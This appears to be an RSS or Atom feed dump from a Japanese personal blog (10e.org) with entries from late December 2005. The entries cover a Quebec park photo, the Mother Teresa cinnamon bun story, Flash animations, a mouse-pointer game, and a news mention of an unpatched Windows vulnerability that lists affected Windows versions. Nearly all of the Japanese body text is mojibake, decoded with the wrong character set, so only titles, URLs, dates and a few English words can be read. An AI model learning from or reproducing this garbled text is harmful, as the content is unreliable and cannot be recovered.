    -‚‚¸‚ֽˆך–‡–‚ּד‚ּ•‚ּ^B
    -¡”N‚Q‚O‚O‚T”N‚ּ‚U‚P“ת‚ֹƒPƒxƒbƒNB‚ּuParc des 7 Chutesv‚ֱ‚ִך‚ֵA^‚נB‚ט‚ָ‚ׂחU•א‚נ‚µ‚ִ‚¢‚ִB‰e‚µ‚½‚ֽ‚±‚ּƒTƒcƒJƒbƒ`H‚ח‚µ‚«ƒ‚ƒm‚ֹ‚ֽ‘S‘R‹C‚ֳ‚©‚ָ‚©‚ֱ‚½‚»‚₪‚ֵ‚·B
    -‚±‚¿‚ח‚ּƒTƒCƒg‚ֵAB‰e‚µ‚½‚‚‚ּ^‚א©‚י‚±‚ֶ‚ֵׂ‚«‚‚·B¨‚±‚¿‚ח
    -‰E‰÷‚ּ•‚ֹ‚ֱ‚ִ‚‚·‚זB

    - -

    ‚Q–‡–‚ּ^‚ֽA‚ַ‚₪‚ֹ‚אƒƒCƒ“ƒ{[ƒ}ƒ“‚ֱ‚ִƒnƒ“ƒhƒ‹ƒl[ƒ€‚ּl‚ׂ±‚¿‚ח‚ּƒTƒCƒg‚ֹ“e‚µ‚½ƒ‚ƒm‚ֵAB‰eך‚ג“ת‚ֽ‘‚¢‚ִ‚ָ‚©‚ֱ‚½‚ח‚µ‚­A‚ֵ‚א‚»‚ּl©g‚×B‰e‚µ‚½ƒ‚ƒm‚¾‚»‚₪‚ֵ‚·B

    - -

    EEEEEEEB
    -‚Q–‡‹₪‚ֹ‰½‚©‚ֱׂ‚ִ‚י‚±‚ֶ‚ֽװˆב‚¢‚ָ‚¢‚ֶv‚₪‚ס‚ֵ‚·‚¯‚ַAu–ל¶‚ּƒSƒƒ‰‚¶‚ב‚ֻ[‚ּHv‚ֱ‚ִ‚ּ‚ֽ‹ײ‹ו‚ֵ‚·B‚µ‚ב‚׳‚י‚ֶפ‚ם‚ך‚‚·B
    -–ל¶‚ּƒSƒƒ‰‚ֱ‚ִ“ס–{‘«‚ֵ‚א•א‚­‚ס‚ֵ‚µ‚וH

    ]]>
    -Mystery -elel -2005-12-30T01:30:09+09:00 -
    - -d—ֽ–³‹’j -http://10e.org/mt/archives/200512/300022.php -12714 B
    -d—ֽ–³‹’j

    - -

    ‚¨‚»‚ח‚­ƒvƒƒ“ƒZƒXƒeƒ“ƒR[‚ֶ‚©Aƒfƒ”ƒBƒbƒgƒJƒbƒp[ƒtƒB[ƒ‹ƒh‚ֶ‚©‚ּ‚¨—F’B‚¾‚ֶv‚₪‚זB
    -‚±‚ּl‚ֽ‚«‚ֱ‚ֶ•¨—‚׋ךט‚¾‚ֱ‚½‚ס‚ֵ‚µ‚ו‚₪ƒlBƒGƒ‹ƒGƒ‹‚אd—ֽ‚ֶ‚©‚ּ–ג‘ט‚ֽ‘ו™‚¢‚¾‚ֱ‚½‚ס‚ֵAˆ׃O‚ֶ‚±‚ּl‚ֶ“¯‚¶‚ז‚₪‚ָƒRƒgo—ˆ‚¿‚ב‚₪‚©‚אB
    -‚ז‚¢q‚ֽƒ}ƒl‚µ‚ִ‚א‚¢‚¢‚¯‚ַA—‚¿‚ִ‚אƒGƒ‹ƒGƒ‹‚ּ‚¹‚¢‚ֹ‚µ‚ָ‚¢‚ֵƒlB

    ]]>
    -VIDEO -elel -2005-12-30T00:22:45+09:00 -
    - -ƒ`ƒ‡ƒRƒ[ƒg -http://10e.org/mt/archives/200512/292151.php -38736 B
    -ƒ`ƒ‡ƒRƒ[ƒg

    - -

    ‚¿‚ו‚ֱ‚±‚ך[‚ֶ`‚¿‚ו‚ֱ‚±‚ך[‚ֶ`ƒ`ƒ‡ƒRƒƒCƒg‚ֽ–¾¡`פ
    -ƒTƒ€ƒlƒCƒ‹‚ָׂ‚ס‚¾‚©‘S‘Rˆ׃–¡•s–¾‚ָ‚ּ‚ֽƒGƒ‹ƒGƒ‹‚ּ‚¹‚¢‚¶‚ב‚ָ‚¢‚זB

    - -

    ‚«‚ֱ‚ֶ”—‚½‚¿‚ֽ–ׂ—ף‚ֹƒ`ƒ‡ƒRƒ[ƒg‚בוD‚«‚ֹˆב‚¢‚ָ‚¢B
    -ƒGƒ‹ƒGƒ‹‚ֽƒ`ƒ‡ƒRƒ[ƒg‚ֽƒLƒ‰ƒC‚¶‚ב‚ָ‚¢‚ֵ‚·‚¯‚ַA‚¢‚ם‚ה‚יuƒ`ƒ‡ƒRƒ[ƒg–¡v‚ֱ‚ִ‚ּ‚ֽ‚ ‚ס‚‚טD‚«‚¶‚ב‚ָ‚¢‚ֵ‚·B‚½‚ֶ‚¦‚־uƒ`ƒ‡ƒRƒ[ƒg–¡‚ּƒAƒCƒXv‚ֶ‚©B‚ ‚ ‚¢‚₪‚ּ‚ֽ‚ַ‚₪‚א‹ךט‚ָlB

    ]]>
    -Babe -elel -2005-12-29T21:51:48+09:00 -
    - -ƒ}ƒU[EƒeƒƒT—‚ּƒpƒ“‚ד‚‚ך‚י -http://10e.org/mt/archives/200512/292119.php -20695 B
    -ƒ}ƒU[EƒeƒƒT—‚ּƒpƒ“‚ד‚‚ך‚י

    - -

    ¢E‚ׁ‚ֱ‚­‚טƒjƒ…[ƒX‚ֹ“ת–{ך‚ּ‹L–‚ׂ ‚ֱ‚½‚זB
    -ƒAƒƒƒJ‚ּƒiƒbƒVƒ…ƒrƒ‹‚ֹ‚ ‚יƒJƒtƒFuBongo JavaƒR[ƒq[ƒVƒ‡ƒbƒvv‚ֹ‚ֽ‚P‚X‚X‚U”N‚ֹ‚¨‹q‚³‚ס‚ֹ‚ז‚ֱ‚ִ”­©‚³‚ך‚½uƒ}ƒU[EƒeƒƒT—‚ּƒpƒ“v‚ֱ‚ִ‚ּ‚ֽƒKƒ‰ƒXƒP[ƒX‚ֹ‚¸‚ֱ‚ֶ‚ֱ‚ִ‚ ‚ֱ‚½‚»‚₪‚ֵ‚·B‚±‚ּƒyƒXƒgƒ[‚ּƒpƒ“‚ֽ‚¿‚ו‚ֱ‚ֶ‚µ‚½ֿץ–¼‚ֶ‚µ‚ִl‚נW‚‚ִ‚¢‚½‚»‚₪‚ֵ‚·‚×A‚»‚ּƒpƒ“‚׃R[ƒq[ƒVƒ‡ƒbƒv‚ֹ“‚ֱ‚½“D–_‚ֹ‚ז‚ֱ‚ִ“‚‚ך‚ִ‚µ‚‚ֱ‚½‚»‚₪‚ֵ‚·B”ֶl‚ֽ‚¨‹א‚ֽ‘S‘R“‚‚¸‚ֹA‚±‚ּƒpƒ“‚¾‚¯‚נ‚ֱ‚ִs‚ֱ‚ִ‚µ‚‚ֱ‚½‚»‚₪‚ֵ‚·B

    - -

    ‚¿‚ָ‚‚ֹ‚±‚ּ‚¨“X‚ּ“X’·‚³‚ס‚ֽˆָ‘O‚ֽ‚±‚ּƒ}ƒU[ƒeƒƒTƒpƒ“‚ּ‚sƒVƒƒƒc‚גƒ}ƒOƒJƒbƒv‚ָ‚ַ‚נ”ּ”„‚µ‚ִ‚¢‚½‚»‚₪‚ֵ‚·‚×A‚P‚X‚X‚V”N‚ֹƒ}ƒU[ƒeƒƒT‚ז‚טu©•ּׂ–¼‘O‚נ₪”„‚ֹg‚ם‚ָ‚¢‚ֵ—~‚µ‚¢v‚ֶ¾‚₪|‚ּט†‚נף‚¯ז‚ט‚»‚₪‚¢‚₪ƒ‚ƒm‚ּ”ּ”„‚נ‚ג‚‚½‚»‚₪‚ֵ‚·B
    -¡‚ֵ‚ֽuNun bunvi“ע‚³‚סƒpƒ“j‚ֶ‚µ‚ִ—L–¼‚ֹ‚ָ‚ֱ‚½‚»‚₪‚ֵ‚·‚×A¡‰ס“‚‚ך‚ִ‚µ‚‚ֱ‚½‚»‚₪‚ֵ‚·B

    - -

    EEEEEB
    -^‚ֽ»•¨‚ּƒpƒ“‚ֵ‚·B
    -ˆך‘ּA‚ַ‚±‚נ‚ַ‚ּ‚ז‚₪‚ֹ©‚י‚ֶƒ}ƒU[ƒeƒƒT‚ֹ‚ָ‚י‚ּ‚©H‚ֱ‚ִ‚ּ‚ֽƒGƒ‹ƒGƒ‹‚ֹ‚ֽƒƒAƒ‹‚ֹ‚ם‚©‚ח‚ָ‚¢‚ס‚ֵ‚·‚×AF‚³‚ס‚ֹ‚ֽ‚ם‚©‚יH
    -‚µ‚ֱ‚©‚µ”ֶl‚ֽ“‚ס‚ֵ‚ַ‚₪‚·‚י‚ס‚¾‚כ‚₪HI‚»‚ס‚ָ‚ֹ—L–¼‚ָƒ‚ƒm‚ֽ”„‚ך‚ָ‚¢‚µA”M‹¶“I‚ָƒ}ƒU[ƒeƒƒTƒtƒ@ƒ“‚ד‚‚נ‚·‚י‚ֱ‚ִ‚ּ‚א‚¿‚ו‚ֱ‚ֶl‚¦‚ֹ‚­‚¢‚µB

    ]]>
    -English News -elel -2005-12-29T21:19:45+09:00 -
    - -Mouse Wars -http://10e.org/mt/archives/200512/292051.php -1815 B
    -Mouse Wars

    - -

    ¢EˆךƒVƒ“ƒvƒ‹‚ָƒVƒ…[ƒeƒBƒ“ƒOƒQ[ƒ€‚©‚אB
    -‚ָ‚ס‚ִ‚½‚ֱ‚ִA©‹@‚ֽƒ}ƒEƒXƒ|ƒCƒ“ƒ^‚ֱ‚·‚©‚ח‚ֻB‘€ל‚ֽ’´’Pƒ‚ֵAu‚‚ֲAז‚יA‚ז‚¯‚יv‚‚½‚¢‚ָEEEB˜gO‚ֹo‚י‚ֶ©“®“I‚ֹƒQ[ƒ€ƒI[ƒo[‚ֹ‚ָ‚ֱ‚¿‚ב‚¢‚‚·‚ּ‚ֵ‚»‚ּƒcƒ‚ƒ‚ֵB

    ]]>
    -GAME -elel -2005-12-29T20:51:30+09:00 -
    - -”N––”Nn‚אFaith‚³‚ס -http://10e.org/mt/archives/200512/290313.php -38267 B
    -Faith‚³‚ס‚¾ƒtƒH[I

    - -

    —¬s‚ֹ—¬‚³‚ך‚ִ‚‚‚µ‚½B
    -‚ָ‚ס‚©ִf‚ּ‚ז‚₪‚ָ‹C‚א‚·‚י‚ּ‚ֵ‚·‚×A‚א‚₪–{‹C‚ֵ‚ז‚­o‚¦‚ִ‚ָ‚¢‚ּ‚ֵ‚[‚¢‚¢‚©ƒtƒH[I
    -i‚ֶ‚ַ‚ּ‚ֲ‚‚טAƒGƒiƒƒ‹ƒ{ƒ“ƒe[ƒW‚ֱ‚ִƒRƒg‚נ¾‚¢‚½‚¢‚ח‚µ‚¢j

    - -

    ”N––”Nn‚ָ‚ס‚ִ‘S‚­ײW‚ָ‚­XV‚·‚י©•ּׂƒTƒCƒg‚ַׂ‚₪‚אƒJƒƒCƒNv‚¦‚ִ‚«‚ִ‚י‚P‚O־‚ֵ‚·B
    -u‚Q‚O‚O‚T”N‘ˆZIv‚‚½‚¢‚ָƒlƒ^‚ֽ‚‚ס‚ַ‚­‚³‚¢‚ּ‚ֵ‚ ‚ס‚‚ט‚ג‚ט‚½‚­‚ָ‚¢‚ח‚µ‚¢B

    - -

    ‚ ‚ֶ‚ֽ‚ׂס‚־‚ֱ‚ִAִf‚ּ‚ז‚₪‚ָ‚»‚₪‚ֵ‚א‚ָ‚¢‚ז‚₪‚ָ‹L‰¯‚ּ‚ ‚¢‚‚¢‚ָƒgƒRƒ‚נƒ`ƒ‡ƒCƒX
    -‚¿‚ו‚ֱ‚ׂ‚טƒVƒƒƒM[‚ָFaith‚³‚ס
    -ƒsƒ“ƒNƒrƒLƒj‚ָFaith‚³‚ס
    -—m•’…‚ִ‚י‚ֶ‚©‚¦‚ֱ‚ִƒGƒ‚¢‚זFaith‚³‚ס
    -‚ַ‚ֱ‚©‚ּ‚¨O‚ֵFaith‚³‚ס
    -ƒ~ƒjƒgƒ‰ƒCƒfƒ“ƒg‚ֱ‚ִ‚יFaith‚³‚ס

    - -

    ¦uƒgƒ‰ƒCƒfƒ“ƒgv‚ֱ‚ִ‚ּ‚ֽO‚ֲ–”‚ּƒ„ƒ‚‚½‚¢‚ָƒ„ƒc‚ּƒRƒgB‚½‚µ‚©‚ ‚ּ_˜b‚ּ_—l‚ּƒ|ƒZƒCƒhƒ“‚³‚ס‚ֱׂ‚ִ‚י‚ס‚¾‚ֶv‚ֱ‚½Bˆ‚µ‚ִƒAƒƒƒJR‚ּצ…ֽ‚ּƒ~ƒTƒCƒ‹‚ּƒRƒg‚ֵ‚ֽ‚ָ‚¢‚ּ‚ֵ‚·BiƒAƒƒƒJR‚ּצ…ֽ‚ּ’e“¹ƒ~ƒTƒCƒ‹‚ּ–¼‘O‚ֹuƒ|ƒZƒCƒhƒ“v‚ֶuƒgƒ‰ƒCƒfƒ“ƒgv‚ֱ‚ִ‚ּ‚ׂ ‚ט‚‚·Bj

    ]]>
    -Babe -elel -2005-12-29T03:13:00+09:00 -
    - -ƒJƒGƒ‹‚נ¶‚ֵH‚׳‚י‚ֶEEE -http://10e.org/mt/archives/200512/290229.php -ƒJƒGƒ‹‚נ¶‚ֵH‚׳‚י‚ֶEEE

    ]]>
    -Strange -elel -2005-12-29T02:29:37+09:00 -
    - -‚¿‚ו‚ֱ‚ֶ‘ׂ‚ֱ‚ִƒl -http://10e.org/mt/archives/200512/290220.php -46593 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚±‚ֱ‚¿‚«‚‚·

    - -

    ƒ€ƒ€ƒbAƒAƒ‚ֽƒlƒR‚נJ‚¯‚י‰¹ƒjƒƒB

    - -

    ƒEƒ`‚ּƒlƒR‚¿‚ב‚ס‚ּך‡‚ֽA‹l‚ֶ‚©‚ֹ‚ֽ”½‰‚µ‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַuִ‚¢‚½‚ֽ‚ס‚״‚סv‚ֶuƒJƒjƒJƒ}ƒ{ƒRv‚ּ“ס‚ֲ‚ֹ‚ֽ‹C‚׋¶‚ֱ‚½‚ז‚₪‚ֹ”½‰‚µ‚‚·B‚·‚²‚¢¨‚¢‚ֵH‚׳‚ז‚₪‚ֶ‚·‚י‚©‚חƒlB

    - -

    ¡“ת‚ֽ‚¿‚ו‚ֱ‚ֶ‚¢‚כ‚¢‚כo‚©‚¯‚ִ‚½‚ט‚µ‚½‚ס‚ֵA‚¿‚ו‚ֱ‚ֶXV‚·‚י‚ּ‘ׂ‚ֱ‚ִƒl`B
    -ז“ת˜b‚µ‚½u”²…‚ּc‚טvA‚ ‚ך•a‰@s‚ֱ‚ִ‚«‚½‚חˆדׂ‚ֹu‚±‚ך‚ֽ…‚¶‚ב‚ָ‚­‚ִ‚©‚³‚װ‚½‚¾‚זv‚ֱ‚ִƒsƒ“ƒZƒbƒg‚ֵז‚ח‚ך‚½B‚»‚ס‚¾‚¯‚¾‚ֱ‚½EEEBƒGƒ‹ƒGƒ‹‚ּ‘‚ֶ‚¿‚טB‚ֵ‚א‚¨‹א‚ֽ‚µ‚ֱ‚©‚טז‚ח‚ך‚‚µ‚½B‚ ‚ך‚ֵuˆ’u—¿‚S‚U‚O‰~v‚ֱ‚ִ‚ּ‚ֽ‰½‰½‚¾‚כ‚₪EEEB

    - -

    ‚א‚₪ƒzƒ“ƒg‚ֹ”N––‚ָ‚ּƒlEEEB•‚ֹ³‚×—ˆ‚ִ‚א‚¢‚¢‚±‚ֶ‚ֽ‰½‚ֹ‚א‚ָ‚¢‚ס‚ֵ‚·‚¯‚ַA‚ֶ‚ט‚ ‚¦‚¸’N‚©‚¨”N‹‚­‚¾‚³‚¢B

    - -

    Windows‚ֹƒpƒbƒ`‚×צJ‚³‚ך‚ִ‚ָ‚¢ֶד«‚ ‚ט
    -×–{“I‚ֹ‘־ˆ•–@‚ֽ‚ָ‚¢‚ח‚µ‚¢B‚»‚ס‚ָƒRƒg¾‚ם‚ך‚ִ‚אƒXƒSƒC¢‚י‚ס‚ֵ‚·‚×EEEB

    - -

    ‘־‚n‚r
    -Windows Server 2003 Datacenter EditionAWindows Server 2003 Enterprise EditionAWindows Server 2003 Standard EditionAWindows Server 2003 Web EditionAWindows XP Home EditionAWindows XP Professional
    -‚ַ‚₪‚ג‚ח‚l‚…‚½‚ס‚ֽ—DG‰‚¬‚י‚ּ‚ֵ‚‚ך‚ִ‚¢‚ָ‚¢‚ז‚₪‚ֵ‚·B‚ג‚ֱ‚½‚ֻ‚l‚…A‚·‚²‚¢‚¼‚l‚…A‚ׂס‚־‚ך‚l‚…B

    - -

    ’ַ‹L
    -ƒAƒz[ƒhƒbƒgƒRƒ€‚ֹיx‚³‚ך‚יƒgƒRƒ‚ֵ‚µ‚½B
    -CO‚ּ‚»‚ךn‚ּƒuƒƒO‚ֹ‚ז‚י‚ֶA‚ַ‚₪‚ג‚ח‘־‚n‚r‚ֹ‚ֽ‚l‚…‚½‚ס‚א‚‚ך‚י‚»‚₪‚ֵ‚·B
    -ƒAƒt[‚ֽ’m‚ח‚ָ‚©‚ֱ‚½‚ּ‚©H‚»‚ך‚ֶ‚אu‚l‚…g‚ֱ‚ִ‚יƒ„ƒc‚ָ‚ס‚ֵ‚א‚₪’n‹…ד‚ֹ‚ֽ‘¶‚µ‚ָ‚¢‚ז‚ָ[v‚ֱ‚ִט‚ֹv‚ֱ‚ִ‚¢‚י‚ּ‚©H‚ַ‚₪‚ָ‚ּH‘·³‹`B

    - -

    ‚ֶ‚ט‚ ‚¦‚¸c‚ט‚ֽ‚‚½–¾“תB

    ]]>
    -¬¾“ת‹L -elel -2005-12-29T02:20:37+09:00 -
    - -’N‚©”²…‚µ‚ִ -http://10e.org/mt/archives/200512/280410.php -74095 B
    -ƒNƒƒbƒN‚·‚י‚ֶ‚ֵ‚ֱ‚©‚­‚ָ‚ט‚‚·

    - -

    ‚±‚ּ¢‚ּƒpƒ‰ƒ_ƒCƒX‚ֹ‚ב[B
    -‚ֵ‚אAQ‚ִ‚¢‚י•z’c‚ּד‚ֹƒlƒR‚ּׂ‚ֱ‚©‚ֱ‚ִ‚­‚י‚ֶƒ}ƒW‚ֹd‚©‚ֱ‚½‚ט‚µ‚‚·BQ‚ך‚‚¹‚סB

    - -

    ‚³‚ֱ‚«‹C‚ֳ‚¢‚½ױ‚‚ּ–ְB
    -ז“ת•a‰@‚ֹs‚ֱ‚ִ”²…‚µ‚ִ‚א‚ח‚ֱ‚½‚ֱ‚ִ¾‚ֱ‚½‚¶‚ב‚ָ‚¢‚ֵ‚·‚©[B‚»‚ך‚©‚ח‚א‚₪•’‚ֹ”G‚ח‚µ‚ִ‚א‚¢‚¢‚ֱ‚ִ¾‚₪‚ס‚ֵ•’‚ֹפ‚ֱ‚½‚ט‚µ‚ִ‚י‚ס‚ֵ‚·‚¯‚ַA¡“ת‚¨•—˜C‚ ‚ֱׂ‚ִ–D‚ֱ‚½‚ֶ‚±‚כ‚נ‚ז[‚­‹¾‚ֵ©‚ִ‚‚½‚חױ‚‚ּ–ְ‚×”­o‚ֵ‚·‚זB–D‚ֱ‚½…‚ׂ‚¾‘S•”ז‚ך‚ִ‚ֻ[‚x‚nI
    -‚±‚ך‚ֽˆד—ֳƒ~ƒX‚ֵ‚·‚©[B

    - -

    ‚ֵ‚אˆדׂ‚ֹ¾‚ם‚ך‚½‚ס‚¾‚זƒl`B‚©‚³‚װ‚½‚ֹ‚ָ‚ֱ‚ִ‚י‚©‚חA‚א‚µ‚©‚µ‚½‚ח–D‚ֱ‚½…‚ׂ‚¾c‚ֱ‚ִ‚י‚©‚א[‚ֱ‚ִBƒ}ƒW‚ֹc‚ֱ‚ִ‚י‚ס‚ֵ‚·‚¯‚ַEEEBƒRƒ©•ֵׂז‚ך‚ָ‚¢‚ּH‚½‚ֱ‚½ˆךj‚ּ‚½‚‚ֹ•a‰@s‚­‚ּ‚©‚ז[Bƒƒ“ƒhƒNƒZ[B
    -ˆדׂ‚ֹs‚ֱ‚ִ‚א‘½•ׂR•b‚­‚ח‚¢‚ֵˆ’u‚×I‚ם‚י—\´B‚»‚ך‚ֵ‚אs‚­‚¾‚¯‚ֵ•a‰@‚ֽ‚V‚R‚O‰~–׳‚©‚י‚ּ‚ֵˆדׂ‚ֽ‹א‚¿‚ָƒƒP‚¾EEEiˆ’u—¿‚ֽ•‚ֵ‚·Bˆ’u—¿‚ֽ‘½•ׂS‚O‚O‰~‚­‚ח‚¢j
    -•¯‚×—˜‚­‚ּ‚ֵ‘Sz•¥‚₪ƒƒP‚¶‚ב‚ָ‚¢‚ֵ‚·‚¯‚ַA‚ֶ‚ֹ‚©‚­•a‰@‚ֹs‚­‚¾‚¯‚ֵ‚V‚R‚O‰~iמ–{f@—¿‚‚½‚¢‚ָƒ‚ƒ“j‚ֱ‚ִ‚ּ‚ֽ‚ַ‚₪‚ֹ‚©‚ָ‚ח‚ָ‚¢‚ס‚ֵ‚·‚©ƒlHI

    - -

    ‚¿‚ָ‚‚ֹ‰f‚ּך‡‚ֽ‚R‚Q‚S‚O‰~B•n–Rl‚ֽ•a‰@‚ָ‚ס‚©ƒqƒ‡ƒRƒqƒ‡ƒRs‚¯‚ָ‚¢‚ז‚ָ‚`B

    - -

    ˜b•ֿ‚ם‚ֱ‚ִB
    -F‚³‚ס‚ֹ‚ֽ‚א‚ּ‚·‚²‚­ײW‚ָ‚¢˜b‚ָ‚ס‚ֵ‚·‚×A¡“ת‚ֽ‚¿‚ו‚ֱ‚ֶ‚¢‚כ‚¢‚כ‰ֶ’כ“I‚ֹ–Z‚µ‚©‚ֱ‚½‚ּ‚ֵ‚ ‚ס‚‚טXVo—ˆ‚ָ‚©‚ֱ‚½‚זB
    -‚װ‚ֱ‚¿‚ב‚¯‚‚·‚ֶAˆהֻ‚ּƒ|ƒ“ƒv‚ּƒ‚[ƒ^[‚׉ף‚ך‚©‚¯‚½EEEB…“¹‚ּײ‚נ‚׀‚ֻ‚י‚ֶ…‚×uƒWƒ‡ƒ{ƒWƒ‡ƒ{v‚ֱ‚ִ•sv‹c‚ָ¨‚¢‚ֵo‚ִ‚«‚ִ¢‚ֱ‚ִ‚¨‚ט‚‚·EEEB‚¢‚ֲ’´‹ַ’n“I’f…ף‘װ‚ֹ‚ָ‚ֱ‚ִ‚א‚¨‚©‚µ‚­‚ָ‚¢ף‘װB
    -”N––”Nn‚ֵ‹x‚‚ֹ‚ָ‚י‚ֶ‚¢‚¯‚ָ‚¢‚ּ‚ֵA‹}‚¢‚ֵˆהֻ‰®‚ֹ—ˆ‚ִ‚א‚ח‚ֱ‚ִ–¾“תH–—\’טB
    -‘O‚ֹ‰ף‚ך‚ִ‚ַ‚₪‚ֹ‚©C—‚µ‚½‚ס‚ֵ‚·‚¯‚ַA‚ֶ‚₪‚ֶ‚₪‚א‚₪ְE‚ח‚µ‚¢B

    - -

    ƒGƒ‹ƒGƒ‹‚ּƒEƒ`‚ֽˆהֻ…‚ָ‚ס‚ֵ‚·‚¯‚ַAּˆר‚ֱ‰z‚µ‚½ז‚ֽ…“¹‚¾‚ֱ‚½‚ס‚ֵ‚·‚¯‚ַ‚ ‚ך‚ֽ‘ֿ‚¦‚ח‚ך‚ָ‚©‚ֱ‚½‚זEEEBּ‚ֱ‚©‚חƒX[ƒp[‚ֶ‚©‚ֵƒ~ƒlƒ‰ƒ‹ƒEƒH[ƒ^[‚ֶ‚©”ƒ‚₪ƒ„ƒc‚ֱ‚ִƒAƒz‚ָ‚ס‚¶‚ב‚ָ‚¢‚ּ‚©H‚ֱ‚ִ–§‚©‚ֹv‚ֱ‚ִ‚½‚ס‚ֵ‚·‚¯‚ַA‚¢‚´©•ׂׅ“¹…‚ּƒgƒRƒ‚ֹs‚ֱ‚½‚חƒ~ƒlƒ‰ƒ‹ƒEƒH[ƒ^[”ƒ‚¢‚‚­‚ט‚ֵ‚µ‚½i־
    -…“¹…‚ּײ‚ּ…‚¾‚¯‚ֽˆש‚‚ָ‚©‚ֱ‚½‚זB•¦‚©‚µ‚ִ‚¨’ƒ‚ֶ‚©ƒR[ƒq[‚ֶ‚©“‚ך‚ך‚־‚¢‚¢‚ס‚¾‚¯‚ַA‚»‚ּ‚‚¶…‚ֽƒ‚ƒmƒXƒQ[L‚­‚ִEEEB¡‚ֽ…“¹…‚ּ‰ֶ‚ׂ‚ֶ‚ס‚ַ‚¾‚ֶv‚₪‚ס‚ֵ‚·‚¯‚ַA‚ֹ‚¨‚¢‚ֶ‚©‹C‚ֹ‚ָ‚ח‚ָ‚¢‚ּH‚א‚ֱ‚ֶ‚אA“s“¹•{§‚ֶ‚©Z‚ך‚ֹ‚ז‚ֱ‚ִ‚א…¿‚ֶ‚©‚ֽ‚¸‚¢‚װ‚סˆב‚₪‚ֶv‚₪‚ס‚ֵ‚·‚¯‚ַƒlB
    -ƒGƒ‹ƒGƒ‹‚ֽ¶‚‚ך‚½ ‚©‚ח‚¸‚ֱ‚ֶˆהֻ…‚¾‚ֱ‚½‚ס‚ֵA‚ ‚ּ…“¹…‚ּL‚¢‚¾‚¯‚ֽ‚¢‚‚ֵ‚א‘S‘Rƒ_ƒB

    - -

    ‚ג‚ֱ‚ֿ‚טµ‚ך‚ָ‚ּ‚©‚ָB

    ]]>
    -¬¾“ת‹L -elel -2005-12-28T04:10:24+09:00 -
    - -’n‰÷CRמ’n‚ּ^ -http://10e.org/mt/archives/200512/280355.php -68959 B
    -’n‰÷CRמ’n‚ּ^
    -iƒƒ“ƒNז’†‘ך‚ֵ‚·j

    - -

    ‰½‚ֶ‚א“ַ‚‚ָ‚¢‚ס‚ֵ‚·‚×A‚ַ‚₪‚ג‚חƒXƒEƒF[ƒfƒ“‚ֶƒ\˜A‚ּCRמ’n‚ּ^‚ח‚µ‚¢B
    -¡‚ֹ‚א‚O‚O‚V‚ֶ‚©o‚ִ‚«‚»‚₪‚ָ•µˆֽ‹C‚ָ‚ס‚ֵ‚·‚¯‚ַA‚ַ‚₪‚ג‚ח–{•¨‚ּ^‚ח‚µ‚¢‚זB‚ַ‚ֱ‚©‚ח‚ֱ‚ִ‚«‚½^‚¾‚©‚ם‚©‚ס‚ָ‚¢‚ס‚ֵ‚·‚×EEEB
    -מ’n©‘ּ‚נל‚ֱ‚½‚ּ‚ֽ‚¢‚ם‚ה‚י—גם‘ד‚‚½‚¢B

    - -

    ‚¨‚‚¯
    -‚P‚R•C‚ּq¢‚ּװ‚¿‚ב‚ס‚×’a¶i’†‘ךj
    -ƒ`ƒ‡[ƒJƒƒCƒCI

    ]]>
    -Image -elel -2005-12-28T03:55:58+09:00 -
    - -‚ג‚ם‚ח‚©םװ -http://10e.org/mt/archives/200512/280341.php -19786 B
    -‚ג‚ם‚ח‚©םװ

    - -

    ‚¨‚ָ‚¶‚Aˆך“x•·‚­‚ֶˆך¶–Y‚ך‚ָ‚¢‚ֵ‚ ‚כ‚₪’†“ֵ«‚ּ‚‚¢‚e‚k‚`‚r‚g‚ֵ‚¨‚ָ‚¶‚‚ּƒEƒFƒuƒeƒ“ƒg‚³‚ס‚ּל•i‚×livedoor ƒCƒ“ƒ^[ƒlƒbƒgƒAƒjƒ[ƒVƒ‡ƒ“‚ָ‚יƒgƒRƒ‚ֵצJ‚³‚ך‚ִ‚¢‚י‚ּ‚ֵ‚·B
    -‚ָ‚ס‚ֶA‚ג‚ם‚ח‚©םװ‚ֽu‚ג‚³‚µ‚³v‚ֵo—ˆ‚ִ‚י‚ּ‚©[I

    - -

    ¡“x’¬’†‚ֵ©‚©‚¯‚½‚ח‚‚ס‚ָ‚אט‚נ‚³‚µ‚ּ‚׳‚ִ‚ ‚°‚ז‚£`Bˆ‚µ‚ִw‚ֵ‚ֲ‚ֱ‚ֲ‚¢‚ִ‚ֽ‚¢‚¯‚ָ‚¢‚ז[B

    - -

    ithanks:(¥ֽ¥)ƒCƒCEƒAƒNƒZƒX‚³‚סj

    ]]>
    -FLASH/J -elel -2005-12-28T03:41:48+09:00 -
    - -DANCE FLOOR MOVES -http://10e.org/mt/archives/200512/280317.php -19268 B
    -DANCE FLOOR MOVES

    - -

    ¦ƒƒ“ƒNז‚ֹ“®‰ז‚ׂ ‚ט‚‚·‚ּ‚ֵA‚ַ‚ך‚ֵ‚אD‚«‚ָ‚ּ‚נ©‚ךB

    - -

    ‚ָ‚ס‚ֶ‚א•sv‹c‚ָƒ‰ƒCƒgƒCƒƒ…[ƒWƒ‡ƒ“‚ֱ‚ִ¾‚₪‚©AƒA[ƒgל•i‚‚½‚¢‚ָ´‚¶‚©‚ָHI
    -“®‰ז‚נ©‚ך‚־‚ם‚©‚י‚ֶv‚₪‚ס‚ֵ‚·‚¯‚ַA’n–‚ֹƒ‰ƒCƒg‚ֵƒ‚ƒUƒCƒNƒ^ƒCƒ‹‚‚½‚¢‚ֹ‚נל‚ֱ‚ִA‚»‚ּד‚נlװ‚×ְ‚ֹ•א‚­‚ֶ‚»‚ּץ‚ּ–ֽ—l‚וsv‹c‚ֹ“®‚­‚ס‚ֵ‚·‚זB‚ַ‚₪‚ג‚ֱ‚ִ‚י‚ס‚ֵ‚µ‚ו‚₪ƒlHI
    -‚ָ‚ס‚ֶ‚אƒVƒXƒeƒ€‚ֽ“ה‚ָ‚ס‚ֵ‚·‚¯‚ַ•sv‹c‚ֵ–”’‚¢‚ּ‚ֵ‚·B‚¿‚ָ‚‚ֹ‚ַ‚±‚ֵ‚א’u‚ֵ‚«‚י‚ח‚µ‚¢‚ֵ‚·‚זB

    ]]>
    -cool -elel -2005-12-28T03:17:17+09:00 -
    - -Visible Human Server -http://10e.org/mt/archives/200512/280247.php -22035 B
    -Visible Human Server

    - -

    ¦ƒƒ“ƒNז‚ֹƒAƒNƒZƒX‚·‚י‚ֶ©“®“I‚ֹƒ|ƒbƒvƒAƒbƒv‚ֵ‚i‚`‚u‚`‚ּƒ\ƒtƒg‚׋N“®‚µ‚‚·B

    - -

